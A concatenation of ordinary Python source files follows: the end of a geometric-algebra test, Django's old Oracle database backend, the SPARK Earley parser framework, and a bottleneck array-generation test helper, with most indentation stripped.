assert str(E1) == '((e2.e3)**2 - 1)*e1 + ((e1.e2) - (e1.e3)*(e2.e3))*e2 + (-(e1.e2)*(e2.e3) + (e1.e3))*e3'
assert str(E2) == '((e1.e2) - (e1.e3)*(e2.e3))*e1 + ((e1.e3)**2 - 1)*e2 + (-(e1.e2)*(e1.e3) + (e2.e3))*e3'
assert str(E3) == '(-(e1.e2)*(e2.e3) + (e1.e3))*e1 + (-(e1.e2)*(e1.e3) + (e2.e3))*e2 + ((e1.e2)**2 - 1)*e3'
w = (E1 | e2)
w = w.expand()
assert str(w) == '0'
w = (E1 | e3)
w = w.expand()
assert str(w) == '0'
w = (E2 | e1)
w = w.expand()
assert str(w) == '0'
w = (E2 | e3)
w = w.expand()
assert str(w) == '0'
w = (E3 | e1)
w = w.expand()
assert str(w) == '0'
w = (E3 | e2)
w = w.expand()
assert str(w) == '0'
w = (E1 | e1)
w = (w.expand()).scalar()
Esq = expand(Esq)
assert str(simplify(w/Esq)) == '1'
w = (E2 | e2)
w = (w.expand()).scalar()
assert str(simplify(w/Esq)) == '1'
w = (E3 | e3)
w = (w.expand()).scalar()
assert str(simplify(w/Esq)) == '1'
return
# ===== next source file =====
"""
Oracle database backend for Django.
Requires cx_Oracle: http://www.python.net/crew/atuining/cx_Oracle/
"""
import os
from django.db.backends import BaseDatabaseWrapper, BaseDatabaseFeatures, BaseDatabaseOperations, util
from django.db.backends.oracle import query
from django.utils.datastructures import SortedDict
from django.utils.encoding import smart_str, force_unicode
# Oracle takes client-side character set encoding from the environment.
os.environ['NLS_LANG'] = '.UTF8'
try:
import cx_Oracle as Database
except ImportError, e:
from django.core.exceptions import ImproperlyConfigured
raise ImproperlyConfigured("Error loading cx_Oracle module: %s" % e)
DatabaseError = Database.Error
IntegrityError = Database.IntegrityError
class DatabaseFeatures(BaseDatabaseFeatures):
allows_group_by_ordinal = False
allows_unique_and_pk = False # Suppress UNIQUE/PK for Oracle (ORA-02259)
empty_fetchmany_value = ()
needs_datetime_string_cast = False
supports_tablespaces = True
uses_case_insensitive_names = True
uses_custom_query_class = True
time_field_needs_date = True
interprets_empty_strings_as_nulls = True
date_field_supports_time_value = False
class DatabaseOperations(BaseDatabaseOperations):
def autoinc_sql(self, table, column):
# To simulate auto-incrementing primary keys in Oracle, we have to
# create a sequence and a trigger.
sq_name = get_sequence_name(table)
tr_name = get_trigger_name(table)
tbl_name = self.quote_name(table)
col_name = self.quote_name(column)
sequence_sql = 'CREATE SEQUENCE %s;' % sq_name
trigger_sql = """
CREATE OR REPLACE TRIGGER %(tr_name)s
BEFORE INSERT ON %(tbl_name)s
FOR EACH ROW
WHEN (new.%(col_name)s IS NULL)
BEGIN
SELECT %(sq_name)s.nextval
INTO :new.%(col_name)s FROM dual;
END;
/""" % locals()
return sequence_sql, trigger_sql
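    # Usage sketch (illustrative table and column names): the pair returned by
    # autoinc_sql() emulates an auto-incrementing primary key, e.g.
    #     sequence_sql, trigger_sql = DatabaseOperations().autoinc_sql('blog_entry', 'id')
    # yields a CREATE SEQUENCE statement plus a BEFORE INSERT trigger that
    # fills the column from the sequence whenever it arrives as NULL.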
def date_extract_sql(self, lookup_type, field_name):
# http://download-east.oracle.com/docs/cd/B10501_01/server.920/a96540/functions42a.htm#1017163
return "EXTRACT(%s FROM %s)" % (lookup_type, field_name)
def date_trunc_sql(self, lookup_type, field_name):
# Oracle uses TRUNC() for both dates and numbers.
# http://download-east.oracle.com/docs/cd/B10501_01/server.920/a96540/functions155a.htm#SQLRF06151
if lookup_type == 'day':
sql = 'TRUNC(%s)' % field_name
else:
sql = "TRUNC(%s, '%s')" % (field_name, lookup_type)
return sql
def datetime_cast_sql(self):
return "TO_TIMESTAMP(%s, 'YYYY-MM-DD HH24:MI:SS.FF')"
def deferrable_sql(self):
return " DEFERRABLE INITIALLY DEFERRED"
def drop_sequence_sql(self, table):
return "DROP SEQUENCE %s;" % self.quote_name(get_sequence_name(table))
def field_cast_sql(self, db_type):
if db_type and db_type.endswith('LOB'):
return "DBMS_LOB.SUBSTR(%s)"
else:
return "%s"
def last_insert_id(self, cursor, table_name, pk_name):
sq_name = util.truncate_name(table_name, self.max_name_length() - 3)
cursor.execute('SELECT %s_sq.currval FROM dual' % sq_name)
return cursor.fetchone()[0]
def limit_offset_sql(self, limit, offset=None):
# Limits and offset are too complicated to be handled here.
# Instead, they are handled in django/db/backends/oracle/query.py.
return ""
def lookup_cast(self, lookup_type):
if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
return "UPPER(%s)"
return "%s"
def max_name_length(self):
return 30
def query_class(self, DefaultQueryClass):
return query.query_class(DefaultQueryClass, Database)
def quote_name(self, name):
# SQL92 requires delimited (quoted) names to be case-sensitive. When
# not quoted, Oracle has case-insensitive behavior for identifiers, but
# always defaults to uppercase.
# We simplify things by making Oracle identifiers always uppercase.
if not name.startswith('"') and not name.endswith('"'):
name = '"%s"' % util.truncate_name(name.upper(), self.max_name_length())
return name.upper()
def random_function_sql(self):
return "DBMS_RANDOM.RANDOM"
def regex_lookup_9(self, lookup_type):
raise NotImplementedError("Regexes are not supported in Oracle before version 10g.")
def regex_lookup_10(self, lookup_type):
if lookup_type == 'regex':
match_option = "'c'"
else:
match_option = "'i'"
return 'REGEXP_LIKE(%%s, %%s, %s)' % match_option
def regex_lookup(self, lookup_type):
# If regex_lookup is called before it's been initialized, then create
# a cursor to initialize it and recur.
from django.db import connection
connection.cursor()
return connection.ops.regex_lookup(lookup_type)
def sql_flush(self, style, tables, sequences):
# Return a list of 'TRUNCATE x;', 'TRUNCATE y;',
# 'TRUNCATE z;'... style SQL statements
if tables:
# Oracle does support TRUNCATE, but it seems to get us into
# FK referential trouble, whereas DELETE FROM table works.
sql = ['%s %s %s;' % \
(style.SQL_KEYWORD('DELETE'),
style.SQL_KEYWORD('FROM'),
style.SQL_FIELD(self.quote_name(table))
) for table in tables]
# Since we've just deleted all the rows, running our sequence
# ALTER code will reset the sequence to 0.
for sequence_info in sequences:
table_name = sequence_info['table']
seq_name = get_sequence_name(table_name)
column_name = self.quote_name(sequence_info['column'] or 'id')
query = _get_sequence_reset_sql() % {'sequence': seq_name,
'table': self.quote_name(table_name),
'column': column_name}
sql.append(query)
return sql
else:
return []
def sequence_reset_sql(self, style, model_list):
from django.db import models
output = []
query = _get_sequence_reset_sql()
for model in model_list:
for f in model._meta.fields:
if isinstance(f, models.AutoField):
sequence_name = get_sequence_name(model._meta.db_table)
column_name = self.quote_name(f.db_column or f.name)
output.append(query % {'sequence': sequence_name,
'table': model._meta.db_table,
'column': column_name})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.many_to_many:
sequence_name = get_sequence_name(f.m2m_db_table())
output.append(query % {'sequence': sequence_name,
'table': f.m2m_db_table(),
'column': self.quote_name('id')})
return output
def start_transaction_sql(self):
return ''
def tablespace_sql(self, tablespace, inline=False):
return "%sTABLESPACE %s" % ((inline and "USING INDEX " or ""), self.quote_name(tablespace))
class DatabaseWrapper(BaseDatabaseWrapper):
features = DatabaseFeatures()
ops = DatabaseOperations()
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': "LIKEC %s ESCAPE '\\'",
'icontains': "LIKEC UPPER(%s) ESCAPE '\\'",
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': "LIKEC %s ESCAPE '\\'",
'endswith': "LIKEC %s ESCAPE '\\'",
'istartswith': "LIKEC UPPER(%s) ESCAPE '\\'",
'iendswith': "LIKEC UPPER(%s) ESCAPE '\\'",
}
oracle_version = None
def _valid_connection(self):
return self.connection is not None
def _cursor(self, settings):
cursor = None
if not self._valid_connection():
if len(settings.DATABASE_HOST.strip()) == 0:
settings.DATABASE_HOST = 'localhost'
if len(settings.DATABASE_PORT.strip()) != 0:
dsn = Database.makedsn(settings.DATABASE_HOST, int(settings.DATABASE_PORT), settings.DATABASE_NAME)
self.connection = Database.connect(settings.DATABASE_USER, settings.DATABASE_PASSWORD, dsn, **self.options)
else:
conn_string = "%s/%s@%s" % (settings.DATABASE_USER, settings.DATABASE_PASSWORD, settings.DATABASE_NAME)
self.connection = Database.connect(conn_string, **self.options)
cursor = FormatStylePlaceholderCursor(self.connection)
# Set oracle date to ansi date format. This only needs to execute
# once when we create a new connection.
cursor.execute("ALTER SESSION SET NLS_DATE_FORMAT = 'YYYY-MM-DD' "
"NLS_TIMESTAMP_FORMAT = 'YYYY-MM-DD HH24:MI:SS.FF'")
try:
self.oracle_version = int(self.connection.version.split('.')[0])
# There's no way for the DatabaseOperations class to know the
# currently active Oracle version, so we do some setups here.
# TODO: Multi-db support will need a better solution (a way to
# communicate the current version).
if self.oracle_version <= 9:
self.ops.regex_lookup = self.ops.regex_lookup_9
else:
self.ops.regex_lookup = self.ops.regex_lookup_10
except ValueError:
pass
try:
self.connection.stmtcachesize = 20
except:
# Django docs specify cx_Oracle version 4.3.1 or higher, but
# stmtcachesize is available only in 4.3.2 and up.
pass
if not cursor:
cursor = FormatStylePlaceholderCursor(self.connection)
# Default arraysize of 1 is highly sub-optimal.
cursor.arraysize = 100
return cursor
class OracleParam(object):
"""
Wrapper object for formatting parameters for Oracle. If the string
representation of the value is large enough (greater than 4000 characters)
the input size needs to be set as NCLOB. Alternatively, if the parameter has
an `input_size` attribute, then the value of the `input_size` attribute will
be used instead. Otherwise, no input size will be set for the parameter when
executing the query.
"""
def __init__(self, param, charset, strings_only=False):
self.smart_str = smart_str(param, charset, strings_only)
if hasattr(param, 'input_size'):
# If parameter has `input_size` attribute, use that.
self.input_size = param.input_size
elif isinstance(param, basestring) and len(param) > 4000:
# Mark any string parameter greater than 4000 characters as an NCLOB.
self.input_size = Database.NCLOB
else:
self.input_size = None
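# Behaviour sketch for OracleParam: string parameters longer than 4000
# characters are bound as NCLOBs; anything else leaves input_size unset
# unless the value carries its own `input_size` attribute.
#
#     OracleParam('x' * 4001, 'utf-8').input_size   # Database.NCLOB
#     OracleParam('short', 'utf-8').input_size      # None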
class FormatStylePlaceholderCursor(Database.Cursor):
"""
Django uses "format" (e.g. '%s') style placeholders, but Oracle uses ":var"
style. This fixes it -- but note that if you want to use a literal "%s" in
a query, you'll need to use "%%s".
We also do automatic conversion between Unicode on the Python side and
UTF-8 -- for talking to Oracle -- in here.
"""
charset = 'utf-8'
def _format_params(self, params):
if isinstance(params, dict):
result = {}
for key, value in params.items():
                result[smart_str(key, self.charset)] = OracleParam(value, self.charset)
return result
else:
return tuple([OracleParam(p, self.charset, True) for p in params])
def _guess_input_sizes(self, params_list):
if isinstance(params_list[0], dict):
sizes = {}
iterators = [params.iteritems() for params in params_list]
else:
sizes = [None] * len(params_list[0])
iterators = [enumerate(params) for params in params_list]
for iterator in iterators:
for key, value in iterator:
if value.input_size: sizes[key] = value.input_size
if isinstance(sizes, dict):
self.setinputsizes(**sizes)
else:
self.setinputsizes(*sizes)
def _param_generator(self, params):
if isinstance(params, dict):
return dict([(k, p.smart_str) for k, p in params.iteritems()])
else:
return [p.smart_str for p in params]
def execute(self, query, params=None):
if params is None:
params = []
else:
params = self._format_params(params)
args = [(':arg%d' % i) for i in range(len(params))]
        # cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL,
        # it does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
query = smart_str(query, self.charset) % tuple(args)
self._guess_input_sizes([params])
return Database.Cursor.execute(self, query, self._param_generator(params))
def executemany(self, query, params=None):
try:
args = [(':arg%d' % i) for i in range(len(params[0]))]
except (IndexError, TypeError):
# No params given, nothing to do
return None
        # cx_Oracle wants no trailing ';' for SQL statements. For PL/SQL,
        # it does want a trailing ';' but not a trailing '/'. However, these
# characters must be included in the original query in case the query
# is being passed to SQL*Plus.
if query.endswith(';') or query.endswith('/'):
query = query[:-1]
query = smart_str(query, self.charset) % tuple(args)
formatted = [self._format_params(i) for i in params]
self._guess_input_sizes(formatted)
return Database.Cursor.executemany(self, query, [self._param_generator(p) for p in formatted])
def fetchone(self):
row = Database.Cursor.fetchone(self)
if row is None:
return row
return tuple([to_unicode(e) for e in row])
def fetchmany(self, size=None):
if size is None:
size = self.arraysize
return tuple([tuple([to_unicode(e) for e in r]) for r in Database.Cursor.fetchmany(self, size)])
def fetchall(self):
return tuple([tuple([to_unicode(e) for e in r]) for r in Database.Cursor.fetchall(self)])
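# Illustration (added note): execute() above rewrites Django's
# format-style placeholders into Oracle named binds before handing the
# query to cx_Oracle, e.g.
#     "SELECT * FROM t WHERE id = %s AND name = %s"
# becomes
#     "SELECT * FROM t WHERE id = :arg0 AND name = :arg1"
# with each parameter wrapped in OracleParam for input-size handling.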
def to_unicode(s):
"""
Convert strings to Unicode objects (and return all other data types
unchanged).
"""
if isinstance(s, basestring):
return force_unicode(s)
return s
def _get_sequence_reset_sql():
# TODO: colorize this SQL code with style.SQL_KEYWORD(), etc.
return """
DECLARE
startvalue integer;
cval integer;
BEGIN
LOCK TABLE %(table)s IN SHARE MODE;
SELECT NVL(MAX(%(column)s), 0) INTO startvalue FROM %(table)s;
SELECT %(sequence)s.nextval INTO cval FROM dual;
cval := startvalue - cval;
IF cval != 0 THEN
EXECUTE IMMEDIATE 'ALTER SEQUENCE %(sequence)s MINVALUE 0 INCREMENT BY '||cval;
SELECT %(sequence)s.nextval INTO cval FROM dual;
EXECUTE IMMEDIATE 'ALTER SEQUENCE %(sequence)s INCREMENT BY 1';
END IF;
COMMIT;
END;
/"""
def get_sequence_name(table):
name_length = DatabaseOperations().max_name_length() - 3
return '%s_SQ' % util.truncate_name(table, name_length).upper()
def get_trigger_name(table):
name_length = DatabaseOperations().max_name_length() - 3
return '%s_TR' % util.truncate_name(table, name_length).upper()
| |
# Copyright (c) 1998-2000 John Aycock
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__version__ = 'SPARK-0.6.1'
import re
import sys
import string
def _namelist(instance):
namelist, namedict, classlist = [], {}, [instance.__class__]
for c in classlist:
for b in c.__bases__:
classlist.append(b)
#for name in dir(c): # dir() behavior changed in 2.2
for name in c.__dict__.keys(): # <-- USE THIS
if not namedict.has_key(name):
namelist.append(name)
namedict[name] = 1
return namelist
class GenericScanner:
def __init__(self):
pattern = self.reflect()
self.re = re.compile(pattern, re.VERBOSE)
self.index2func = {}
for name, number in self.re.groupindex.items():
self.index2func[number-1] = getattr(self, 't_' + name)
def makeRE(self, name):
doc = getattr(self, name).__doc__
rv = '(?P<%s>%s)' % (name[2:], doc)
return rv
def reflect(self):
rv = []
for name in _namelist(self):
if name[:2] == 't_' and name != 't_default':
rv.append(self.makeRE(name))
rv.append(self.makeRE('t_default'))
return string.join(rv, '|')
def error(self, s, pos):
print "Lexical error at position %s" % pos
raise SystemExit
def tokenize(self, s):
pos = 0
n = len(s)
while pos < n:
m = self.re.match(s, pos)
if m is None:
self.error(s, pos)
groups = m.groups()
for i in range(len(groups)):
if groups[i] and self.index2func.has_key(i):
self.index2func[i](groups[i])
pos = m.end()
def t_default(self, s):
r'( . | \n )+'
pass
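# Minimal usage sketch (added; not part of the original SPARK code):
# a subclass defines t_<name> methods whose docstrings are the regular
# expressions; tokenize() dispatches each match to the method of the
# same name, with t_default catching everything else.
class _ExampleWordScanner(GenericScanner):
    def __init__(self):
        GenericScanner.__init__(self)
        self.tokens = []
    def t_whitespace(self, s):
        r'\s+'
        pass
    def t_word(self, s):
        r'[a-zA-Z]+'
        self.tokens.append(s)
# _ExampleWordScanner().tokenize('two words') collects ['two', 'words']
# in .tokens; the explicit whitespace rule keeps the greedy t_default
# from swallowing the rest of the input.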
class GenericParser:
def __init__(self, start):
self.rules = {}
self.rule2func = {}
self.rule2name = {}
self.collectRules()
self.startRule = self.augment(start)
self.ruleschanged = 1
_START = 'START'
_EOF = 'EOF'
#
# A hook for GenericASTBuilder and GenericASTMatcher.
#
def preprocess(self, rule, func): return rule, func
def addRule(self, doc, func):
rules = string.split(doc)
index = []
for i in range(len(rules)):
if rules[i] == '::=':
index.append(i-1)
index.append(len(rules))
for i in range(len(index)-1):
lhs = rules[index[i]]
rhs = rules[index[i]+2:index[i+1]]
rule = (lhs, tuple(rhs))
rule, fn = self.preprocess(rule, func)
if self.rules.has_key(lhs):
self.rules[lhs].append(rule)
else:
self.rules[lhs] = [ rule ]
self.rule2func[rule] = fn
self.rule2name[rule] = func.__name__[2:]
self.ruleschanged = 1
def collectRules(self):
for name in _namelist(self):
if name[:2] == 'p_':
func = getattr(self, name)
doc = func.__doc__
self.addRule(doc, func)
def augment(self, start):
#
# Tempting though it is, this isn't made into a call
# to self.addRule() because the start rule shouldn't
# be subject to preprocessing.
#
startRule = (self._START, ( start, self._EOF ))
self.rule2func[startRule] = lambda args: args[0]
self.rules[self._START] = [ startRule ]
self.rule2name[startRule] = ''
return startRule
def makeFIRST(self):
union = {}
self.first = {}
for rulelist in self.rules.values():
for lhs, rhs in rulelist:
if not self.first.has_key(lhs):
self.first[lhs] = {}
if len(rhs) == 0:
self.first[lhs][None] = 1
continue
sym = rhs[0]
if not self.rules.has_key(sym):
self.first[lhs][sym] = 1
else:
union[(sym, lhs)] = 1
changes = 1
while changes:
changes = 0
for src, dest in union.keys():
destlen = len(self.first[dest])
self.first[dest].update(self.first[src])
if len(self.first[dest]) != destlen:
changes = 1
#
# An Earley parser, as per J. Earley, "An Efficient Context-Free
# Parsing Algorithm", CACM 13(2), pp. 94-102. Also J. C. Earley,
# "An Efficient Context-Free Parsing Algorithm", Ph.D. thesis,
# Carnegie-Mellon University, August 1968, p. 27.
#
def typestring(self, token):
return None
def error(self, token):
print "Syntax error at or near `%s' token" % token
raise SystemExit
def parse(self, tokens):
tree = {}
tokens.append(self._EOF)
states = { 0: [ (self.startRule, 0, 0) ] }
if self.ruleschanged:
self.makeFIRST()
for i in xrange(len(tokens)):
states[i+1] = []
if states[i] == []:
break
self.buildState(tokens[i], states, i, tree)
#_dump(tokens, states)
if i < len(tokens)-1 or states[i+1] != [(self.startRule, 2, 0)]:
del tokens[-1]
self.error(tokens[i-1])
rv = self.buildTree(tokens, tree, ((self.startRule, 2, 0), i+1))
del tokens[-1]
return rv
def buildState(self, token, states, i, tree):
needsCompletion = {}
state = states[i]
predicted = {}
#print state
#print token
for item in state:
rule, pos, parent = item
lhs, rhs = rule
#
# A -> a . (completer)
#
if pos == len(rhs):
if len(rhs) == 0:
needsCompletion[lhs] = (item, i)
for pitem in states[parent]:
if pitem is item:
break
prule, ppos, pparent = pitem
plhs, prhs = prule
if prhs[ppos:ppos+1] == (lhs,):
new = (prule,
ppos+1,
pparent)
if new not in state:
state.append(new)
tree[(new, i)] = [(item, i)]
else:
tree[(new, i)].append((item, i))
continue
nextSym = rhs[pos]
#
# A -> a . B (predictor)
#
if self.rules.has_key(nextSym):
#
# Work on completer step some more; for rules
# with empty RHS, the "parent state" is the
# current state we're adding Earley items to,
# so the Earley items the completer step needs
# may not all be present when it runs.
#
if needsCompletion.has_key(nextSym):
new = (rule, pos+1, parent)
olditem_i = needsCompletion[nextSym]
if new not in state:
state.append(new)
tree[(new, i)] = [olditem_i]
else:
tree[(new, i)].append(olditem_i)
#
# Has this been predicted already?
#
if predicted.has_key(nextSym):
continue
predicted[nextSym] = 1
ttype = token is not self._EOF and \
self.typestring(token) or \
None
if ttype is not None:
#
# Even smarter predictor, when the
# token's type is known. The code is
# grungy, but runs pretty fast. Three
# cases are looked for: rules with
# empty RHS; first symbol on RHS is a
# terminal; first symbol on RHS is a
# nonterminal (and isn't nullable).
#
for prule in self.rules[nextSym]:
new = (prule, 0, i)
prhs = prule[1]
if len(prhs) == 0:
state.append(new)
continue
prhs0 = prhs[0]
if not self.rules.has_key(prhs0):
if prhs0 != ttype:
continue
else:
state.append(new)
continue
first = self.first[prhs0]
if not first.has_key(None) and \
not first.has_key(ttype):
continue
state.append(new)
continue
for prule in self.rules[nextSym]:
#
# Smarter predictor, as per Grune &
# Jacobs' _Parsing Techniques_. Not
# as good as FIRST sets though.
#
prhs = prule[1]
if len(prhs) > 0 and \
not self.rules.has_key(prhs[0]) and \
token != prhs[0]:
continue
state.append((prule, 0, i))
#
# A -> a . c (scanner)
#
elif token == nextSym:
#assert new not in states[i+1]
states[i+1].append((rule, pos+1, parent))
def buildTree(self, tokens, tree, root):
stack = []
self.buildTree_r(stack, tokens, -1, tree, root)
return stack[0]
def buildTree_r(self, stack, tokens, tokpos, tree, root):
(rule, pos, parent), state = root
while pos > 0:
want = ((rule, pos, parent), state)
if not tree.has_key(want):
#
# Since pos > 0, it didn't come from closure,
# and if it isn't in tree[], then there must
# be a terminal symbol to the left of the dot.
# (It must be from a "scanner" step.)
#
pos = pos - 1
state = state - 1
stack.insert(0, tokens[tokpos])
tokpos = tokpos - 1
else:
#
# There's a NT to the left of the dot.
# Follow the tree pointer recursively (>1
# tree pointers from it indicates ambiguity).
# Since the item must have come about from a
# "completer" step, the state where the item
# came from must be the parent state of the
# item the tree pointer points to.
#
children = tree[want]
if len(children) > 1:
child = self.ambiguity(children)
else:
child = children[0]
tokpos = self.buildTree_r(stack,
tokens, tokpos,
tree, child)
pos = pos - 1
(crule, cpos, cparent), cstate = child
state = cparent
lhs, rhs = rule
result = self.rule2func[rule](stack[:len(rhs)])
stack[:len(rhs)] = [result]
return tokpos
def ambiguity(self, children):
#
# XXX - problem here and in collectRules() if the same
# rule appears in >1 method. But in that case the
# user probably gets what they deserve :-) Also
# undefined results if rules causing the ambiguity
# appear in the same method.
#
sortlist = []
name2index = {}
for i in range(len(children)):
((rule, pos, parent), index) = children[i]
lhs, rhs = rule
name = self.rule2name[rule]
sortlist.append((len(rhs), name))
name2index[name] = i
sortlist.sort()
list = map(lambda (a,b): b, sortlist)
return children[name2index[self.resolve(list)]]
def resolve(self, list):
#
# Resolve ambiguity in favor of the shortest RHS.
# Since we walk the tree from the top down, this
# should effectively resolve in favor of a "shift".
#
return list[0]
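# Minimal usage sketch (added; not part of the original SPARK code):
# grammar rules live in the docstrings of p_<name> methods, written as
# 'lhs ::= rhs'; each method receives the matched right-hand-side values
# and returns the value for its left-hand side.
class _ExampleListParser(GenericParser):
    def __init__(self):
        GenericParser.__init__(self, 'list')
    def p_list_1(self, args):
        ' list ::= item '
        return [args[0]]
    def p_list_2(self, args):
        ' list ::= list item '
        return args[0] + [args[1]]
    def p_item(self, args):
        ' item ::= x '
        return args[0]
# _ExampleListParser().parse(['x', 'x']) returns ['x', 'x']; plain
# strings work as tokens here because the scanner step compares tokens
# against terminal symbols with '=='.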
#
# GenericASTBuilder automagically constructs a concrete/abstract syntax tree
# for a given input. The extra argument is a class (not an instance!)
# which supports the "__setslice__" and "__len__" methods.
#
# XXX - silently overrides any user code in methods.
#
class GenericASTBuilder(GenericParser):
def __init__(self, AST, start):
GenericParser.__init__(self, start)
self.AST = AST
def preprocess(self, rule, func):
rebind = lambda lhs, self=self: \
lambda args, lhs=lhs, self=self: \
self.buildASTNode(args, lhs)
lhs, rhs = rule
return rule, rebind(lhs)
def buildASTNode(self, args, lhs):
children = []
for arg in args:
if isinstance(arg, self.AST):
children.append(arg)
else:
children.append(self.terminal(arg))
return self.nonterminal(lhs, children)
def terminal(self, token): return token
def nonterminal(self, type, args):
rv = self.AST(type)
rv[:len(args)] = args
return rv
#
# GenericASTTraversal is a Visitor pattern according to Design Patterns. For
# each node it attempts to invoke the method n_<node type>, falling
# back onto the default() method if the n_* can't be found. The preorder
# traversal also looks for an exit hook named n_<node type>_exit (no default
# routine is called if it's not found). To prematurely halt traversal
# of a subtree, call the prune() method -- this only makes sense for a
# preorder traversal. Node type is determined via the typestring() method.
#
class GenericASTTraversalPruningException:
pass
class GenericASTTraversal:
def __init__(self, ast):
self.ast = ast
def typestring(self, node):
return node.type
def prune(self):
raise GenericASTTraversalPruningException
def preorder(self, node=None):
if node is None:
node = self.ast
try:
name = 'n_' + self.typestring(node)
if hasattr(self, name):
func = getattr(self, name)
#print("Calling "+name)
func(node)
else:
self.default(node)
except GenericASTTraversalPruningException:
return
for kid in node:
self.preorder(kid)
name = name + '_exit'
if hasattr(self, name):
func = getattr(self, name)
func(node)
def postorder(self, node=None):
if node is None:
node = self.ast
for kid in node:
self.postorder(kid)
name = 'n_' + self.typestring(node)
if hasattr(self, name):
func = getattr(self, name)
func(node)
else:
self.default(node)
def default(self, node):
pass
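# Minimal usage sketch (added; assumes AST nodes expose a .type
# attribute and iterate over their children, as typestring() and
# preorder() require): visitor methods are named n_<node type>.
class _ExampleNodeCounter(GenericASTTraversal):
    def __init__(self, ast):
        GenericASTTraversal.__init__(self, ast)
        self.count = 0
        self.preorder()
    def n_word(self, node):
        # called once for every node whose type is 'word'
        self.count += 1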
#
# GenericASTMatcher. AST nodes must have "__getitem__" and "__cmp__"
# implemented.
#
# XXX - makes assumptions about how GenericParser walks the parse tree.
#
class GenericASTMatcher(GenericParser):
def __init__(self, start, ast):
GenericParser.__init__(self, start)
self.ast = ast
def preprocess(self, rule, func):
rebind = lambda func, self=self: \
lambda args, func=func, self=self: \
self.foundMatch(args, func)
lhs, rhs = rule
rhslist = list(rhs)
rhslist.reverse()
return (lhs, tuple(rhslist)), rebind(func)
def foundMatch(self, args, func):
func(args[-1])
return args[-1]
def match_r(self, node):
self.input.insert(0, node)
children = 0
for child in node:
if children == 0:
self.input.insert(0, '(')
children = children + 1
self.match_r(child)
if children > 0:
self.input.insert(0, ')')
def match(self, ast=None):
if ast is None:
ast = self.ast
self.input = []
self.match_r(ast)
self.parse(self.input)
def resolve(self, list):
#
# Resolve ambiguity in favor of the longest RHS.
#
return list[-1]
def _dump(tokens, states):
for i in range(len(states)):
print 'state', i
for (lhs, rhs), pos, parent in states[i]:
print '\t', lhs, '::=',
print string.join(rhs[:pos]),
print '.',
print string.join(rhs[pos:]),
print ',', parent
if i < len(tokens):
print
print 'token', str(tokens[i])
print
| |
from typing import Callable, List, Union
import numpy as np
import bottleneck as bn
INT_DTYPES = [np.int64, np.int32]
FLOAT_DTYPES = [np.float64, np.float32]
DTYPES = tuple(FLOAT_DTYPES + INT_DTYPES)
def get_functions(
module_name: str, as_string: bool = False
) -> List[Union[str, Callable[[np.ndarray], Union[int, float, np.ndarray]]]]:
"""Returns a list of functions, optionally as string function names"""
if module_name == "all":
funcs = []
funcs_in_dict = func_dict()
for key in funcs_in_dict:
for func in funcs_in_dict[key]:
funcs.append(func)
else:
funcs = func_dict()[module_name]
if as_string:
funcs = [f.__name__ for f in funcs]
return funcs
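# Example (added note): get_functions("move", as_string=True) returns the
# moving-window function names, e.g. ['move_sum', 'move_mean', ...,
# 'move_rank'], in the order defined by func_dict() below.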
def func_dict():
d = {}
d["reduce"] = [
bn.nansum,
bn.nanmean,
bn.nanstd,
bn.nanvar,
bn.nanmin,
bn.nanmax,
bn.median,
bn.nanmedian,
bn.ss,
bn.nanargmin,
bn.nanargmax,
bn.anynan,
bn.allnan,
]
d["move"] = [
bn.move_sum,
bn.move_mean,
bn.move_std,
bn.move_var,
bn.move_min,
bn.move_max,
bn.move_argmin,
bn.move_argmax,
bn.move_median,
bn.move_rank,
]
d["nonreduce"] = [bn.replace]
d["nonreduce_axis"] = [
bn.partition,
bn.argpartition,
bn.rankdata,
bn.nanrankdata,
bn.push,
]
return d
# ---------------------------------------------------------------------------
def arrays(func_name, dtypes=DTYPES):
return array_iter(array_generator, func_name, dtypes)
def array_iter(arrays_func, *args):
for a in arrays_func(*args):
if a.ndim < 2:
yield a
# this is good for an extra check but in everyday development it
# is a pain because it doubles the unit test run time
# elif a.ndim == 3:
# for axes in permutations(range(a.ndim)):
# yield np.transpose(a, axes)
else:
yield a
yield a.T
def array_generator(func_name, dtypes):
"""Iterator that yields arrays to use for unit testing."""
f_dtypes = list(set(dtypes) & set(FLOAT_DTYPES))
# define nan and inf
if func_name in ("partition", "argpartition"):
nan = 0
else:
nan = np.nan
if func_name in ("move_sum", "move_mean", "move_std", "move_var"):
# these functions can't handle inf
inf = 8
else:
inf = np.inf
# nan and inf
for dtype in f_dtypes:
yield np.array([inf, nan], dtype=dtype)
yield np.array([inf, -inf], dtype=dtype)
yield np.array([nan, 2, 3], dtype=dtype)
yield np.array([-inf, 2, 3], dtype=dtype)
if func_name != "nanargmin":
yield np.array([nan, inf], dtype=dtype)
# byte swapped
yield np.array([1, 2, 3], dtype=">f4")
yield np.array([1, 2, 3], dtype="<f4")
# make sure slow is callable
yield np.array([1, 2, 3], dtype=np.float16)
# regression tests
for dtype in dtypes:
yield np.array([1, 2, 3], dtype=dtype) + 1e9 # check that move_std is robust
yield np.array([0, 0, 0], dtype=dtype) # nanargmax/nanargmin
for dtype in f_dtypes:
yield np.array([1, nan, nan, 2], dtype=dtype) # nanmedian
